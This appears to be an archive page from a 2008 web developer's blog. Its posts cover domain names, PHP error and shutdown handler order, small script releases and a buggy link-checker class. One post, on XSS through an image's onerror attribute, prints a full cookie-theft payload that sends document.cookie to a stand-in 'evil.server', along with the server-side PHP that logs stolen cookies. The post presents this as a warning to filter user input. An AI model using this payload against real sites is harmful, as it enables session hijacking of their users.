What is a Domain Name?

May 11th, 2008 by Aaron

What is a domain name or a dot com name? And why are they needed? Let’s find out.

What is a Domain Name?
A domain name is a pointer to a website. Whenever you hear someone say www.yahoo.com or www.google.com, they’re referring to the domain name of that website. Domain names are controlled by an official registry which allows websites to purchase the right to use that name, reserve it, and point it to a specific website.

Certain companies, called Registrars, provide the interface to this registry. These companies are licensed to provide this service – which is sometimes bundled with additional services. Prices can range from $9 to $35 annually, depending on the company providing the domain name and the extra services they might provide.

Why are they needed?
Every computer on the internet has a numeric address assigned to it. It is far easier to remember the name and type http://www.yahoo.com instead of typing the equivalent http://69.147.76.15. Also, depending on the type of web hosting, many websites can be served from the same computer with one numeric address. Because of this, multiple domain names are assigned – one to represent each individual website at that numeric address.

What are the restrictions and types?
The most common domain name ends with ‘.com.’ You might also be familiar with .net, .org, .co.uk, .info, .biz – the list goes on and on. The domain name has to be 255 characters or less. There are other restrictions on certain domain names – such as .gov has to be a verified government entity. Finally, they can only contain certain special non-alphanumeric characters. Generally speaking, most people with commercial business entities online choose .com (dot com for commercial). Others may also choose .net. Organizations and non profits tend to choose .org. The .com is the most popular domain name type.

Do I Own the Domain Name?
When you purchase registration of a domain name through a registrar, make sure that they register the domain name in your name. This generally happens now, but in the past this was sometimes not the case. Once you’re listed as the administrative contact, you have the ability to modify – with the registrar’s help – any of the settings on your domain name including which computer the address points to. Technically, you do not OWN the domain name – it’s more of a lease. For the most part, domain names fall under trademark and copyright laws – so if you have a registered business, you should have no problem hanging on to your domain name for as long as you want it.

What Should I Keep in Mind When Choosing a Domain Name?
Domain names are on a first come – first serve basis. It may make sense to register your domain name as soon as possible – even if your website is not available. This should guarantee that no one else can register your domain name, potentially disrupting the design process of your website.

Generally, a shorter name is better. Try not to use contractions or hard to spell words. Too many acronyms, especially if it is not common in your industry can be confusing.

Lets see an example. Your company name is XYZ Stairs and Doors. Your target market is North Eastern Wisconsin.
xyz.com – awesome – probably taken because it is so small – but would be easy to remember.
xyzstairsanddoors.com – the full company name. Highly targeted.
xyzstairsndoors.com – users might type in ‘and’ instead of ‘n’
newstairsanddoors.com – North Eastern Wisconsin is commonly abbreviated as NEW – so this is targeted.
northeasternwisconsinstairsanddoors.com – not good – too long – doesn’t say much about your company – but is targeted.
qualityentrances.com – interesting idea. May work better with creative companies, but not so well with technical/industrial companies.

What to Do Next?
If you have a business name and are getting your website ready, you may ask your firm to investigate into your options for domain names. You might also ask them for specific ones – and they can do research for you. You might want to pay up front for the domain registration so that they can register it immediately for you. You may also suggest they register alternate spellings of your domain name. It is not necessary to get all the different types of domain names for your company – however some have found success registering both the .com and .net versions of their name.

If you need to register a domain name with your project, contact 102 Degrees. We’ll be glad to provide this service.


Categories: learning

Newest Version of 102 Degrees Launched

May 3rd, 2008 by Aaron

To better reflect our business model and offer more services online to our visitors and customers, we’ve redesigned our website. Integration with the downloadable products, open source, technical blog and training materials enriches the website experience. Check out the new website options; all feedback is welcome.


Categories: news

Which Fires First? Error Handler or Shutdown Function

April 24th, 2008 by Aaron

I was working on writing a shutdown function for a PHP 4 script and noticed some odd behavior when I was getting errors (no way! I program and get errors? Who knew!?) At any rate, when I would handle my error with my custom function, I noticed the shutdown function was still executing after the error function. (Or when it was a Fatal error, the error was shown to the screen but the shutdown function was still ran…)

This got me to thinking about handling error redirection pages and sending messages on fatal errors in PHP4 (you’ll remember that a fatal error won’t execute the error handler, and therefore most of our custom code to make a nice ‘message’ won’t execute). But anyway, I digress.

I’m using PHP5.2 - this is the code I used to test:

?View Code PHP
1
2
3
4
5
6
7
8
9
10
11

<?php
function error_function() {
  print 'error function';
}
function shutdown_function() {
  print 'shutdown function';
}
set_error_handler('error_function');
register_shutdown_function('shutdown_function');
print 1/0;
?>

So, as you can tell, the error handler happens FIRST and then the shutdown function


Categories: PHP

SimplePHPMailer

April 24th, 2008 by Aaron

There are a very small amount of really easy to implement PHP mailer scripts in the wild. They usually try to pump so many features into them that it becomes difficult to implement or too large of a file. For those looking for just a quick drop-in solution - that you DON’T need to know PHP to use - SimplePHPMailer was developed. All that is needed is to drop the php file into the same area as your form, open it up, and read the instructions. There are some straight forward configuration options with very easy to understand comments. Download it for your next quick project.

SimplePHPMailer 0.1a


Categories: PHPopen source

JS Tool - Security Auditing in Javascript

April 24th, 2008 by Aaron

JSTool was a trial run of combining many different scripts from the open source community into a security and auditing script. Features would include history viewing, website status reporting and port scanning. Very little original code - just combinations of existing code. Check the comments for proper author attribution. This script really isn’t in working condition for production distribution. Download it and learn from it.

JS Tool


Categories: javascriptsecurity

Meta Tag Generator

April 24th, 2008 by Aaron

Meta Tag Generator uses javascript to generate the proper format for some common meta tags. This was originally just a proof of concept script that I decided to release.

Meta Tag Generator


Categories: htmlopen source

PHP Shared Host - Session File Browser Script

April 24th, 2008 by Aaron

PHP stores its session information into flat files unencrypted by default. In shared hosting situations, this can be a big security issue. This script allows easy access to the attributes of these files as well as decoding of the values stored in them. This script can also be used to audit the security of your current configuration. If other users’ session information is available, your information is not secure either!

Session Browser 0.1a


Categories: PHPopen sourcesecurity

Which Conference Should I go to - Help me in 2008

April 1st, 2008 by Aaron

So, luckily, my current employer will pay and make arrangements for me to attend one major conference each year. Last year I attended Mysqlconf, the year before, Zend Con.

Which should I goto this year? Here are the things to consider:

  • I don’t have a US passport - so it has to be in the US - Unless there is enough lead time to get a passport (how much time does that take anymore these days? Do I need to wear the mark of the beast now? *squints at Real-ID*)
  • It has to be something web related (yah very clear Aaron - thanks. Microsoft makes front page and windows Live search - does that make them web related? *sigh* This means web programming language, analysis or tool based. I don’t know how more broad ones like ‘future of web apps’ types would work…)
  • I’d like it to be focused on open source (oracle fans, be damned!)

So - it’s pretty simple. Any suggestions?


Categories: Uncategorized

XSS with Img OnError attribute

March 19th, 2008 by Aaron

So much of my time is spent worrying over the src or href tags on images and links - that I sometimes forget about the other attributes.

Imagine being able to make an image which has no black-flagged content in the src but yet can still make a remote request, logging the user’s cookie information? Thats right - this can be done - using the ‘onerror’ attribute of an image.

What you need to do is to create an image link that is obviously broken or empty. Then, javascript handles such events by throwing an error for that element. Add an item to the onerror attribute to request a remote URL as your images src - which you add on document.cookie. The remote script logs all requests, and then displays an image.

Check out the code below:

Source page without proper filtering:

?View Code HTML
1
2
3
4
5
6
7

<html>
<body>
<h1>test</h1>
<h2>asdf</h2>
<img src="" onerror="this.src='http://evil.server/exploit.php?'+document.cookie" />
</body>
</html>

Then, on evil.server, place your image. Finally, top it off with the following code in exploit.php

?View Code PHP
1
2
3
4
5
6
7
8

<?php
$image_path = 'test.jpg';
header('Accept-Ranges: bytes');
header('Content-Length: ' . filesize($image_path));
header('Keep-Alive: timeout=15, max=2469');
echo file_get_contents($image_path);
file_put_contents("cookieLog.txt", $_SERVER['REQUEST_URI']);
?>

Easy as that. Just another reminder to properly filter your use submitted content.


Categories: PHPjavascriptsecurity

Link Checking Module - 1st attempt

March 19th, 2008 by Aaron

So I wrote some code the other day. It sat in my code repository and I never tested it. I was pretty certain it was going to be some good code, though.

A few weeks later I came back to it and looked through it - and laughed!! Anyone figure out where ALL the holes are in this code?

?View Code PHP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86

<?php
class linkChecker
{
    protected $_links = array();
 
    protected $_sites = array();
 
 
    public function __construct() 
    {
 
    }
 
    public function addSite($site)
    {
        if (in_array($site, $this->_sites)) {
            throw new linkException("Site already in list");
        }
 
        $this->_sites[] = $site;
    }
 
    public function processSites()
    {
        foreach ($this->_sites as $site) {
            $this->_processLinks($site);
        }
    }
 
    protected function _processLinks($url)
    {
        $this->_addLink($url, $url);
        $d = new DomDocument;
        @$d->loadHTMLFile($url);
        foreach ($d->getElementsByTagName('a') as $link) {
            $this->_addLink($link->getAttribute('href'), $url);
        }
        unset($d);
    }
 
    protected function _addLink($link, $url)
    {
        $l = new checkableLink($link, $url);
        if (!isset($this->_links[$l->url])) {
            $this->_checkLink($l);
            $this->_links[$l->url] = $l;
        }
        unset($l);
    }
 
    protected function _checkLink(checkableLink &amp;$checkableLink)
    {
        $d = new DomDocument;
        $d->loadHTMLFile($checkableLink->url) or $checkableLink->valid = false;
    }
}
 
 
 
 
 
 
class checkableLink
{
    public $host = null;
 
    public $url = null;
 
    public $checked = false;
 
    public $valid = true;
 
    public function __construct($link = null, $url = null)
    {
        if (stripos($link, '/') === 0) {
            $this->url = $url . $link;
        }
        else {
            $this->url = $url;
        }
    }
}
 
class linkException extends exception
{}
?>


« Previous Entries | Next Entries »

102 Degrees Blog

Web Programming and Design by Aaron Saray


©2008 102 Degrees LLC - All Rights Reserved Home Services Products Network Blog Open Source Learning Contact